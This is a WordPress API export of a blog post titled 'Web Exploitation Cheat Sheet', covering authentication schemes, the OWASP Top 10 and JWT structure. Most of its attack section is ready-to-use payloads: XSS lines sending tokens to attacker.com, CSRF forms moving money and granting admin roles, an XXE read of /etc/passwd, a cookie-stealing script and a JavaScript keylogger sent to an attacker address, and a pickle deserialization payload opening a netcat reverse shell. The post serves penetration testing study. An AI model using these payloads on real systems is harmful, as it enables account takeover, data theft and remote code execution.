{"id":2656,"date":"2022-01-04T03:02:48","date_gmt":"2022-01-04T03:02:48","guid":{"rendered":"https:\/\/dft.wiki\/?p=2656"},"modified":"2026-04-22T17:52:24","modified_gmt":"2026-04-22T21:52:24","slug":"web-exploitation-cheat-sheet","status":"publish","type":"post","link":"https:\/\/dft.wiki\/?p=2656","title":{"rendered":"Web Exploitation Cheat Sheet"},"content":{"rendered":"<p>Web exploitation cannot happen without <strong>proxying and advanced tools<\/strong> such as.<\/p>\n<ul>\n<li><strong>Burp Suite<\/strong>\n<ul>\n<li>Not open-source, but it offers a free community edition [<a href=\"https:\/\/portswigger.net\/burp\/communitydownload\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<li><strong>OpenVAS<\/strong>\n<ul>\n<li>Free and open-source [<a href=\"https:\/\/www.openvas.org\/\">Link<\/a>].<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p>It is fundamental to master all <strong>OWASP TOP 10<\/strong> vulnerabilities.<\/p>\n<ul>\n<li><strong>A01:2021 &#8211; Broken Access Control<\/strong>\n<ul>\n<li>Incorrectly implemented authentication and session management calls.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A02:2021 &#8211; Cryptographic Failures<\/strong>\n<ul>\n<li>Fail to protect the data in transit and at rest. Example: plan text passwords, do not use SSL&#8230;<\/li>\n<\/ul>\n<\/li>\n<li><strong>A03:2021 &#8211; Injection<\/strong>\n<ul>\n<li>Insecure code to insert (or inject) as if it were part of the code of the program.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A04:2021 &#8211; Insecure Design<\/strong>\n<ul>\n<li>Missing or ineffective control in the design of the application.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A05:2021 &#8211; Security Misconfiguration<\/strong>\n<ul>\n<li>Misconfigured access controls, such as default credentials or empty passwords.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A06:2021 &#8211; Vulnerable and Outdated Components<\/strong>\n<ul>\n<li>When the software is vulnerable, unsupported, or out of date. Including the OS, dependencies&#8230;<\/li>\n<\/ul>\n<\/li>\n<li><strong>A07:2021 &#8211; Identification and Authentication Failures<\/strong>\n<ul>\n<li>Fail to confirm the user&#8217;s identity, authentication, and session management.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A08:2021 &#8211; Software and Data Integrity Failures<\/strong>\n<ul>\n<li>Data integrity issues related to code or infrastructure. Violations caused by libraries from untrusted sources, CDNs&#8230;<\/li>\n<\/ul>\n<\/li>\n<li><strong>A09:2021 &#8211; Security Logging and Monitoring Failures<\/strong>\n<ul>\n<li>Issues that fail to detect, escalate, and respond to active breaches.<\/li>\n<\/ul>\n<\/li>\n<li><strong>A10:2021 &#8211; Server-Side Request Forgery (SSRF)<\/strong>\n<ul>\n<li>Flaws occur whenever a web application is fetching a remote resource without validating the user-supplied URL.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p><strong>AUTHENTICATION<\/strong><\/p>\n<ul>\n<li><strong>Basic Auth<\/strong>\n<ul>\n<li>\n<pre><span class=\"token header-name keyword\">Authorization<\/span><span class=\"token punctuation\">:<\/span> <span class=\"token header-value\">Basic\u00a0dXNlcm5hbWU6cGFzc3dvcmQ=<\/span><\/pre>\n<\/li>\n<li>Where <code>dXNlcm5hbWU6cGFzc3dvcmQ=<\/code> is\u00a0 <code>username:password<\/code> encoded in Base64.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Session Token<\/strong>\n<ul>\n<li>\n<pre><span class=\"token header-name keyword\">Authorization<\/span><span class=\"token punctuation\">:<\/span> <span class=\"token header-value\">Bearer 68e8c01795215bc01492faf3403a400c<\/span><\/pre>\n<\/li>\n<li>Where <code>68e8c01795215bc01492faf3403a400c<\/code> is just an opaque, randomly generated hash stored.<\/li>\n<li>It requires a server-side look-up for each request (local storage or database), where it can be revoked if compromised.<\/li>\n<\/ul>\n<\/li>\n<li><strong>JWT<\/strong>\n<ul>\n<li>\n<pre><span class=\"token header-name keyword\">Authorization<\/span><span class=\"token punctuation\">:<\/span> <span class=\"token header-value\">Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9<strong><span style=\"color: #ff0000;\">.<\/span><\/strong>eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0<span style=\"color: #ff0000;\"><strong>.<\/strong><\/span>KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30<\/span><\/pre>\n<\/li>\n<li>The token can be divided into three parts:\n<ul>\n<li><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9<\/code> is the header,<\/li>\n<li><code>eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0<\/code> is the payload,<\/li>\n<li><code>KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30<\/code> is the signature.<\/li>\n<li>The signature makes it self-sufficient, meaning the server can verify it autonomously and accept it within the expiration period (not revokeable).<\/li>\n<\/ul>\n<\/li>\n<li>The header defines how the header+payload are signed. Typically, <strong>HS256<\/strong> (symmetric) or <strong>RS256<\/strong> (asymmetric).\n<ul>\n<li>Common mistakes are not checking the signature (set to <code>\"alg\": \"none\"<\/code>, and optionally, remove the signature entirely).<\/li>\n<li>If the server-side key is exposed, try to force <strong>HS256<\/strong> and sign the token with the symmetric key.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>On the client-side, the authentication is typically stored using the following methods.<\/p>\n<ul>\n<li><strong>Local Storage<\/strong>\n<ul>\n<li>It can be seen by any script running on the page.<\/li>\n<li>Susceptible to <strong>XSS<\/strong> attacks:\n<ul>\n<li>\n<pre>fetch(`https:\/\/attacker.com\/steal?data=${localStorage.getItem('token')}`);<\/pre>\n<\/li>\n<li>\n<pre>new Image().src = `https:\/\/attacker.com\/log?token=${localStorage.getItem('auth_token')}`;<\/pre>\n<\/li>\n<li>\n<pre>location.replace(`https:\/\/attacker.com\/collect?token=${localStorage.getItem('session')}`);<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>HTTP-Only<\/strong>\n<ul>\n<li>The token is stored at the browser level, and JavaScript cannot see it.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Cookie<\/strong>\n<ul>\n<li>When <code>samesite=none<\/code>, the browser will send the cookie on any request the page makes, including to other origins.<\/li>\n<li>Susceptible to <strong>CSFR<\/strong> attacks:\n<ul>\n<li><strong>Reflected<\/strong>\n<ul>\n<li>It is delivered to the victim through an external link, a spoofed website, or a malicious email.<\/li>\n<li>The malicious website contains a hidden code that makes a call to the vulnerable website on behalf of the user.<\/li>\n<li>If the user is already authenticated on the vulnerable site, the browser will send a valid session token.<\/li>\n<li>\n<pre>&lt;img src=\"https:\/\/bank.com\/transfer?amount=10000&amp;to=AttackerID\" width=\"0\" height=\"0\" \/&gt;<\/pre>\n<\/li>\n<li>\n<pre>&lt;form id=\"steal\" action=\"https:\/\/bank.com\/transfer\" method=\"POST\"&gt;\r\n&lt;input type=\"hidden\" name=\"amount\" value=\"10000\" \/&gt;\r\n&lt;input type=\"hidden\" name=\"to\" value=\"AttackerID\" \/&gt;\r\n&lt;\/form&gt;&lt;script&gt;document.getElementById('steal').submit();&lt;\/script&gt;<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Stored<\/strong> \/ <strong>DOM-Based<\/strong>\n<ul>\n<li>The malicious code, typically a JavaScript or an HTML, is <strong>Stored<\/strong> (persistently) in the vulnerable website that does not properly sanitize\/validate users&#8217; inputs (e.g, posts, messages).<\/li>\n<li>Any user who views the infected page (like a forum thread, a profile, or a support ticket) will unknowingly execute the attack.<\/li>\n<li>Because the request originates from the same domain as the vulnerable site, it is highly effective at bypassing browser security settings and is often harder for users to detect.<\/li>\n<li>The difference between <strong>DOM-Based<\/strong> and stored is that it happens on the live rendering of the site, but it has the same impact and capability.<\/li>\n<li>\n<pre>&lt;img src=\"https:\/\/vulnerable-site.com\/api\/delete-account\" width=\"0\" height=\"0\" \/&gt;<\/pre>\n<\/li>\n<li>\n<pre>&lt;script&gt;\r\nfetch('https:\/\/vulnerable-site.com\/api\/update-role', {\r\nheaders: { 'Content-Type': 'application\/x-www-form-urlencoded' },\r\nmethod: 'POST', body: 'user_id=attacker_id&amp;role=admin',\r\ncredentials: 'include' });\r\n&lt;\/script&gt;<\/pre>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li>Some attacks can be prevented with<code>samesite=strict<\/code>, but not all.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<hr \/>\n<p><strong>MORE PAYLOADS<\/strong><\/p>\n<ul>\n<li><strong>XXE<\/strong> (XML eXternal Entity attack)<\/li>\n<\/ul>\n<pre>&lt;?xml version=\"1.0\"?&gt;\r\n&lt;!DOCTYPE root [&lt;!ENTITY read SYSTEM 'file:\/\/\/etc\/passwd'&gt;]&gt;\r\n&lt;root&gt;&amp;read;&lt;\/root&gt;<\/pre>\n<ul>\n<li><strong>XSS<\/strong> (possible in JavaScript, VBScript, Flash, and CSS)<\/li>\n<\/ul>\n<p>It is worth mentioning the popular sources of payloads: PayLoadBox [<a href=\"https:\/\/github.com\/payloadbox\/xss-payload-list\">Link<\/a>], XSS-Payloads [<a href=\"http:\/\/www.xss-payloads.com\/\">Link<\/a>].<\/p>\n<p><strong>Quick test<\/strong> for a low-hanging fruit:<\/p>\n<pre>&lt;script&gt;<span data-slate-fragment=\"JTdCJTIyb2JqZWN0JTIyJTNBJTIyZG9jdW1lbnQlMjIlMkMlMjJkYXRhJTIyJTNBJTdCJTdEJTJDJTIybm9kZXMlMjIlM0ElNUIlN0IlMjJvYmplY3QlMjIlM0ElMjJibG9jayUyMiUyQyUyMnR5cGUlMjIlM0ElMjJwYXJhZ3JhcGglMjIlMkMlMjJpc1ZvaWQlMjIlM0FmYWxzZSUyQyUyMmRhdGElMjIlM0ElN0IlN0QlMkMlMjJub2RlcyUyMiUzQSU1QiU3QiUyMm9iamVjdCUyMiUzQSUyMnRleHQlMjIlMkMlMjJsZWF2ZXMlMjIlM0ElNUIlN0IlMjJvYmplY3QlMjIlM0ElMjJsZWFmJTIyJTJDJTIydGV4dCUyMiUzQSUyMmFsZXJ0KDEpJTIyJTJDJTIybWFya3MlMjIlM0ElNUIlN0IlMjJvYmplY3QlMjIlM0ElMjJtYXJrJTIyJTJDJTIydHlwZSUyMiUzQSUyMmNvZGUlMjIlMkMlMjJkYXRhJTIyJTNBJTdCJTdEJTdEJTVEJTJDJTIyc2VsZWN0aW9ucyUyMiUzQSU1QiU1RCU3RCU1RCUyQyUyMmtleSUyMiUzQSUyMmVjNjRmZTcwOGRlYTQwMmY5OGIzZjQyNWViY2ZjNGFiJTIyJTdEJTVEJTJDJTIya2V5JTIyJTNBJTIyZTE4MWVmN2VhODExNDVkZGIzMmQ5ODgzNzU4NmQxMTglMjIlN0QlNUQlMkMlMjJrZXklMjIlM0ElMjJlMGJiMDZlZmI3ZjU0MGZlYmFiZDJhMDNiMmNjMmE2NiUyMiU3RA==\">alert(1)<\/span>&lt;\/script&gt;<\/pre>\n<pre class=\"wp-block-preformatted\">&lt;image src=\"javascript:alert(1)\"&gt;<\/pre>\n<pre class=\"wp-block-preformatted\">&lt;body oninput=javascript:alert(1)&gt;&lt;input autofocus&gt;<\/pre>\n<pre class=\"wp-block-preformatted\">&lt;img \\x00src=x onerror=\"alert(1)\"&gt;<\/pre>\n<p>A payload for <strong>stealing Cookies<\/strong>:<\/p>\n<pre>&lt;script&gt;document.location='http:\/\/ip:port\/?='+document.cookie;&lt;\/script&gt;<\/pre>\n<p>A very simple <strong>key logger<\/strong>:<\/p>\n<pre>&lt;script&gt;\r\nvar keys='';\r\ndocument.onkeypress = function(e) {\r\n  get = window.event?event:e;\r\n  key = get.keyCode?get.keyCode:get.charCode;\r\n  key = String.fromCharCode(key);\r\n  keys+=key;\r\n}\r\nwindow.setInterval(function(){\r\n  new Image().src = 'http<span style=\"color: #ff0000;\"><strong>s<\/strong><\/span>:\/\/<strong>attackerAddress<\/strong>\/<strong>kl<\/strong>.php?c='+keys;\r\n  keys = '';\r\n}, 1000);\r\n&lt;\/script&gt;<\/pre>\n<ul>\n<li><strong>Insecure DeSerialization<\/strong> (the output of the following script is the payload)<\/li>\n<\/ul>\n<pre>import pickle\r\nimport sys\r\nimport base64\r\ncommand = 'rm \/tmp\/f; mkfifo \/tmp\/f; cat \/tmp\/f | ' '\/bin\/sh -i 2&gt;&amp;1 | netcat <strong>10.10.10.10 4444<\/strong> &gt; \/tmp\/f'\r\nclass rce(object):\r\n    def __reduce__(self):\r\n        import os\r\n        return (os.system,(command,))\r\nprint(base64.b64encode(pickle.dumps(rce())))<\/pre>\n<hr \/>\n<p><strong>INJECTION<\/strong><\/p>\n<ul>\n<li><strong>SQLmap<\/strong> &#8211; SQL injection and database takeover [<a href=\"https:\/\/sqlmap.org\/\">Link<\/a>]:<\/li>\n<\/ul>\n<pre>sqlmap -r <strong>requestFile<\/strong>\r\nsqlmap -r <strong>requestFile<\/strong> --dump<\/pre>\n<p>Note: the <strong>requestFile<\/strong> contains the HTTP request that SQLmap will use to perform iterations of injections.<\/p>\n<p>See more usage and examples of <strong>SQLmap<\/strong> in the other post [<a href=\"https:\/\/dft.wiki\/?p=822#SQLmap\">Link<\/a>].<\/p>\n<hr \/>\n<p><strong>MORE ON JWT<\/strong><\/p>\n<p>&lt;HEADER&gt;<strong>.<\/strong>&lt;BODY&gt;<strong>.<\/strong>&lt;SIGNATURE&gt;<\/p>\n<p>Online handy tools [<a href=\"https:\/\/jwt.io\/\">Link<\/a>] and [<a href=\"https:\/\/dinochiesa.github.io\/jwt\/\">Link<\/a>].<\/p>\n<ul>\n<li><strong>Header<\/strong>\n<ul>\n<li><code>alg<\/code> (Algorithm)\n<ul>\n<li><code>ES256<\/code> Elliptic Curve (asymmetric).<\/li>\n<li><code>RS256<\/code> RSA with SHA-256 (asymmetric).<\/li>\n<li><code>HS256<\/code> HMAC with SHA-256 (<span style=\"text-decoration: underline; color: red;\">symmetric<\/span>).<\/li>\n<li>more<\/li>\n<\/ul>\n<\/li>\n<li><code>typ<\/code> (Type)\n<ul>\n<li><code>JWT<\/code> JSON Web Token. Default value.<\/li>\n<li><code>JWS<\/code> JSON Web Signature, which is a signed JSON.<\/li>\n<li><code>JWE<\/code> JSON Web Encryption, which is an encrypted JSON.<\/li>\n<\/ul>\n<\/li>\n<li><code>kid<\/code> (Key ID)\n<ul>\n<li>It identifies the key used to sign the JWT.<\/li>\n<\/ul>\n<\/li>\n<li><code>jku<\/code> (JWK set URL)\n<ul>\n<li>Contains the URL to the public key in a JWK Set Jason format as an array of <code>keys<\/code>.<\/li>\n<li>Most popular: <strong>RSA<\/strong>\n<ul>\n<li><code>use<\/code> (intended Use) = <code>sig<\/code><\/li>\n<li><code>n<\/code> (Modulus) = <code>Eq4...x3JjcHw<\/code><\/li>\n<li><code>e<\/code> (Exponent) = <code>AQAB<\/code><\/li>\n<li><code>alg<\/code> (Algorithm) = <code>RS256<\/code><\/li>\n<\/ul>\n<\/li>\n<li>Most secure: <strong>EC<\/strong>\n<ul>\n<li><code>crv<\/code> (Curve) = <code>P-256<\/code><\/li>\n<li><code>x<\/code> (Coordinate in Base64) = <code>Usdf...Tou87Fs<\/code><\/li>\n<li><code>y<\/code> Coordinate in Base64) = <code>x9KJjo...MJ89x<\/code><\/li>\n<li><code>alg<\/code> (Algorithm) = <code>ES256<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><strong>Payload<\/strong>\n<ul>\n<li>Anything in a JSON format.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Signature<\/strong>\n<ul>\n<li>It is a hash look-alike generated by applying a cryptographic function to a combination of the header and the payload.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Web exploitation cannot happen without proxying and advanced tools such as. Burp Suite Not open-source, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-2656","post","type-post","status-publish","format-standard","hentry","category-hacking"],"_links":{"self":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2656","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2656"}],"version-history":[{"count":17,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2656\/revisions"}],"predecessor-version":[{"id":5514,"href":"https:\/\/dft.wiki\/index.php?rest_route=\/wp\/v2\/posts\/2656\/revisions\/5514"}],"wp:attachment":[{"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2656"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2656"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dft.wiki\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2656"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}